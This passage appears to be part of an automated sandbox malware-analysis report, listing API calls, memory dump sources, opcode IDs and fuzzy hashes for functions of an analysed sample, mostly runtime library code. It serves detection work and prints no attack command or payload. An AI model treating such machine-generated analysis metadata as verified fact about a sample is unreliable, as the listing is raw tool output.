                                                                                                                                                                                                                                                    • std::_Rethrow_future_exception.LIBCPMT ref: 006B5E79
                                                                                                                                                                                                                                                      • Part of subcall function 00693A60: __Mtx_unlock.LIBCPMT ref: 00693B54
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3298230783-0
                                                                                                                                                                                                                                                    • Opcode ID: fc2a33124ba6cd01b9efc92859e78c65081f78dbbb3fb8817e6fc6dea1edc40c
                                                                                                                                                                                                                                                    • Instruction ID: fdaef4fc4cb3be27ff98586ef520711901320526398af78c274133559e2acbc0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc2a33124ba6cd01b9efc92859e78c65081f78dbbb3fb8817e6fc6dea1edc40c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74412DB1D007489FCB11EBA4D802BEEBBFE9F16700F00456DF54257642DB31A684C7A6
                                                                                                                                                                                                                                                    Function 006D70AE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D717E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D71A7
                                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,006D390D,00000000,006D3BA4,?,?,?,?,?,?,?,006D390D,006D3BA4,00000000), ref: 006D71D9
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,006D390D,006D3BA4,00000000,?,?,?,?,00000000), ref: 006D71F5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1547350101-0
                                                                                                                                                                                                                                                    • Opcode ID: ac7c390f0f5401520f11a55092b27c8d28a4b676a9ee25e580a818d2566aa8ce
                                                                                                                                                                                                                                                    • Instruction ID: 91e201879577cc37537704aba99d6d0ce47f332b92835f6e98c2e8122c64c4a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac7c390f0f5401520f11a55092b27c8d28a4b676a9ee25e580a818d2566aa8ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E41D832D04245ABDB516BB8CC42FAD3677EF46364F1C025AF524E7392FA34C9418766
                                                                                                                                                                                                                                                    Function 00692F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3264154886-0
                                                                                                                                                                                                                                                    • Opcode ID: cc8d4357730d9155e09573cd30d0f3269ce81318ced12bc9a8a118f93bbd5030
                                                                                                                                                                                                                                                    • Instruction ID: 4d9251567e7d85a2a56e7be177f1a5097edf4954ec0044f94fa037d27762cbe4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc8d4357730d9155e09573cd30d0f3269ce81318ced12bc9a8a118f93bbd5030
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B41BFB1A00611AFCB11DF24C840BAAB7E9FF19324F04452DE81AC7B51EB35EA51CBC1
                                                                                                                                                                                                                                                    Function 006CEED3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006BE878: _free.LIBCMT ref: 006BE886
                                                                                                                                                                                                                                                      • Part of subcall function 006CE37F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,006CC502,?,00000000,00000000), ref: 006CE42B
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 006CEF3B
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006CEF42
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 006CEF81
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006CEF88
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 167067550-0
                                                                                                                                                                                                                                                    • Opcode ID: 5e0043358d394be945eed77fae06c93b3790eecb75fb839eb2c0b1e8c5a94207
                                                                                                                                                                                                                                                    • Instruction ID: 901d68409de9888b3e352ed25f1f50a5498d21d167d41d1aa1fbc8de291ed76d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0043358d394be945eed77fae06c93b3790eecb75fb839eb2c0b1e8c5a94207
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE21C1B1604215AF9B20AF619C81FBBBBBFEF01364710851CF968CB251DB32ED4097A0
                                                                                                                                                                                                                                                    Function 006C6CF0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,006BE157,?,?,?,?,006BEFF2,?), ref: 006C6CF5
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6D52
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6D88
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,006BE157,?,?,?,?,006BEFF2,?), ref: 006C6D93
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                    • Opcode ID: 3164e0b0fef0499afdbc109293879f50be88c51db3a2ca0cc8fd53a8c883354e
                                                                                                                                                                                                                                                    • Instruction ID: 8bdaa67c972ad345fdb6db34c93ab2d37506eb79875f6196e76dff6613b5d3d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3164e0b0fef0499afdbc109293879f50be88c51db3a2ca0cc8fd53a8c883354e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA11C2323042012ED7602674EC85FBB265BDFC1375B25033CF226976E2ED65DC42926C
                                                                                                                                                                                                                                                    Function 006B7F88 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006B7EE9: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,006B7F3B,00000014,?,006B7F7C,00000014,?,00692D32,00000000,00000014), ref: 006B7EF5
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 006B7FCE
                                                                                                                                                                                                                                                    • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,495BF602,?,?,?,006D87B0,000000FF), ref: 006B7FF6
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 006B8031
                                                                                                                                                                                                                                                    • __Cnd_broadcast.LIBCPMT ref: 006B8042
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 420990631-0
                                                                                                                                                                                                                                                    • Opcode ID: 222514ebebe6d3defce5f6b064c23b81e5e88a3b282101d06ecd7a8950cad1ea
                                                                                                                                                                                                                                                    • Instruction ID: ba1994e2079bdbb0e8a79a4d260e5642d88fa5ab650d80920d61dd9afe569d50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 222514ebebe6d3defce5f6b064c23b81e5e88a3b282101d06ecd7a8950cad1ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5911B4B6908611AFCB216B65EC02AAF77AFEF91760B00081EF80197651CF35D881C759
                                                                                                                                                                                                                                                    Function 006C6E47 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,006C1187,00692397), ref: 006C6E4C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6EA9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C6EDF
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,006C1187,00692397), ref: 006C6EEA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                    • Opcode ID: ccb63cc8c46e10f0f386636273d10da7de21d81b9fef08ed9d53e0f98c6d5264
                                                                                                                                                                                                                                                    • Instruction ID: 86f37c55a8d51bdd82d9565771efd4db3b475cc08eae3cea3347e81f311f8a01
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccb63cc8c46e10f0f386636273d10da7de21d81b9fef08ed9d53e0f98c6d5264
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E11A5363082042EDB616675EC81F7B256BDBC5775B25033EF624D72E2DE21CC41915C
                                                                                                                                                                                                                                                    Function 006C9DBF Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,006D58B7,?,?,?,00000020,00000001), ref: 006C9DD5
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,006D58B7,?,?,?,00000020,00000001), ref: 006C9DDF
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006C9DE6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2398240785-0
                                                                                                                                                                                                                                                    • Opcode ID: facef3657e9191db07068bd19ee71af5fc754810a35b013003f6cc3d25189ef3
                                                                                                                                                                                                                                                    • Instruction ID: 63496d67bd0171904703eeb158e00f6fede29ce52701025c9c63f91804715b37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: facef3657e9191db07068bd19ee71af5fc754810a35b013003f6cc3d25189ef3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF067325005557B8B105B66CC0CEA6BF6BFF497A03048519F619CB511C731E861D7E0
                                                                                                                                                                                                                                                    Function 006C9E28 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,006D5842,?,?,?,?,00000020,00000001), ref: 006C9E3E
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,006D5842,?,?,?,?,00000020,00000001), ref: 006C9E48
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006C9E4F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2398240785-0
                                                                                                                                                                                                                                                    • Opcode ID: fa835036e07003bbda56df426b9fdc62ef4395eafd33cd5b5b3ff130caf7c083
                                                                                                                                                                                                                                                    • Instruction ID: 5101050707def4e7366c3cee6aefb452faf5b1509024293f5892359d864346bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa835036e07003bbda56df426b9fdc62ef4395eafd33cd5b5b3ff130caf7c083
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EF01232600115BB8F215BA6DC08EAABF6BFF5A7A0304851DF519CA521D731D851DBE4
                                                                                                                                                                                                                                                    Function 006D741A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,006D3F02,00000000,00000001,00000000,00000000,?,006C7A66,?,?,00000000), ref: 006D7431
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,006D3F02,00000000,00000001,00000000,00000000,?,006C7A66,?,?,00000000,?,00000000,?,006C7FB2,?), ref: 006D743D
                                                                                                                                                                                                                                                      • Part of subcall function 006D7403: CloseHandle.KERNEL32(FFFFFFFE,006D744D,?,006D3F02,00000000,00000001,00000000,00000000,?,006C7A66,?,?,00000000,?,00000000), ref: 006D7413
                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 006D744D
                                                                                                                                                                                                                                                      • Part of subcall function 006D73C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006D73F4,006D3EEF,00000000,?,006C7A66,?,?,00000000,?), ref: 006D73D8
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,006D3F02,00000000,00000001,00000000,00000000,?,006C7A66,?,?,00000000,?), ref: 006D7462
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                    • Opcode ID: a51692a3cd3541c4aa6ef215bff5cf6bf8574cc2e0c7dda455d21026537fda43
                                                                                                                                                                                                                                                    • Instruction ID: 05d1347a166b2a44e08d4cf30130bf07ca8cd946198e53a74488073681de3b0f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a51692a3cd3541c4aa6ef215bff5cf6bf8574cc2e0c7dda455d21026537fda43
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DF01C36904255BBCF621F91DC08AD93F67EB193A1B005015FA08C9220E6328960EB91
                                                                                                                                                                                                                                                    Function 006B9A8A Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SleepConditionVariableCS.KERNEL32(?,006B9A27,00000064,?,?,?,00692E1C,006FCDC4), ref: 006B9AAD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(006F8FA8,00692E1C,?,006B9A27,00000064,?,?,?,00692E1C,006FCDC4), ref: 006B9AB7
                                                                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(00692E1C,00000000,?,006B9A27,00000064,?,?,?,00692E1C,006FCDC4), ref: 006B9AC8
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(006F8FA8,?,006B9A27,00000064,?,?,?,00692E1C,006FCDC4), ref: 006B9ACF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3269011525-0
                                                                                                                                                                                                                                                    • Opcode ID: a9c160b1026e8769e0d19a96a94063fc8c2c5499798a7d5f516f4f7240291195
                                                                                                                                                                                                                                                    • Instruction ID: 1958642c52e1075bba58045f884841da02f6b48eac023cda23de45d1e9bd13b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9c160b1026e8769e0d19a96a94063fc8c2c5499798a7d5f516f4f7240291195
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CE01235A92268AFCF111F50EC49AED3E27EF0A7A2B115051FB055F160CF7119519BD4
                                                                                                                                                                                                                                                    Function 006C4629 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C4632
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: HeapFree.KERNEL32(00000000,00000000,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?), ref: 006C80EC
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: GetLastError.KERNEL32(?,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?,?), ref: 006C80FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C4645
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C4656
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006C4667
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 30a046287a07863359de94047e67feaa7b73fc664ff8e9ae85b78e881f13748f
                                                                                                                                                                                                                                                    • Instruction ID: 2d5f551d5e26170843500fb2f60a0ec39eb9251227e1170a84f8cb37c0e37a4f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30a046287a07863359de94047e67feaa7b73fc664ff8e9ae85b78e881f13748f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E04F718111209E9B712F15BC01BB63A33F708710706200FF41863235DB790A52DFE9
                                                                                                                                                                                                                                                    Function 006C338D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 006C341D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
